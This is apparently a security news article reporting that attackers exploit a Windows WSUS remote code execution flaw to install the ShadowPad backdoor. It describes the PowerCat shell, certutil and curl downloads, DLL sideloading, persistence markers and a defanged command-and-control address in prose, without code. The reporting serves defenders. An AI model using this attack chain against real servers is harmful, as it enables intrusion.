Chinese-backed attackers have begun weaponizing a critical vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute ShadowPad, a sophisticated backdoor malware linked to multiple state-sponsored groups.
The attack chain exploits CVE-2025-59287, a remote code execution flaw that grants system-level access to vulnerable servers.
Since the proof-of-concept code was released publicly in October, threat actors have rapidly adopted this vulnerability to compromise enterprise networks running WSUS infrastructure.
The attack begins when hackers target Windows Servers with WSUS enabled, leveraging CVE-2025-59287 to gain initial system access.
Once inside, attackers deploy PowerCat, an open-source PowerShell-based utility that provides direct command shell access to the compromised system.
This first-stage foothold allows attackers to execute subsequent commands needed for malware deployment.
ASEC security analysts identified the malware after observing PowerCat execution commands being used in attacks.
The researchers documented how threat actors then download and install ShadowPad using legitimate Windows utilities like certutil and curl. This technique helps evade detection because these tools are standard components of Windows systems.
On November 6th, ASEC’s infrastructure detected attackers downloading multiple encoded files before decoding and executing them as the ShadowPad payload.
Persistence Through DLL Sideloading
ShadowPad operates through a clever evasion technique called DLL sideloading. Rather than running as a standalone executable, the malware uses a legitimate Windows application (ETDCtrlHelper.exe) that loads a malicious DLL (ETDApix.dll) with the same name.
When the legitimate program runs, it unknowingly loads the compromised library, which acts as a loader for the actual ShadowPad backdoor operating entirely in memory.
The core malware functionality is stored in a temporary file containing complete backdoor configuration data.
The malware establishes persistence by creating services, registry entries, and scheduled tasks with the identifier “Q-X64.” It communicates with command-and-control servers at 163.61.102[.]245 using HTTP and HTTPS protocols while disguising traffic with standard Firefox browser headers.
The malware can inject itself into multiple system processes, including Windows Mail, Media Player, and svchost services.
Organizations running WSUS should immediately apply Microsoft’s security update for CVE-2025-59287 and monitor server logs for suspicious PowerShell, certutil, and curl execution patterns to detect potential compromise attempts.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
